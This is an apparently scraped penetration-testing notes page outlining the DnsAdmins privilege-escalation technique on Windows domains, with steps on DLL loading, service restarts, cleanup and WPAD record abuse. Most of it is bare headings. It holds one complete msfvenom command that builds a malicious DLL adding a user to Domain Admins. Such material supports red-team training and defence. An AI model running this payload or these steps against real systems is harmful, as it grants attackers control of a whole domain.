Windows DnsAdmins Attacks
Leveraging DnsAdmins Access
Generating Malicious DLL
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dllStarting Local HTTP Server
Downloading File to Target
Loading DLL as Non-Privileged User
Check our current user's permissions on the DNS service.
Stopping the DNS Service
Starting the DNS Service
Confirming Group Membership
Cleaning Up
Confirming Registry Key Added
Deleting Registry Key
Starting the DNS Service Again
Checking DNS Service Status
Using Mimilib.dll
Reference
Creating a WPAD Recorder
Disabling the Global Query Block List
Adding a WPAD Record
Reference
Last updated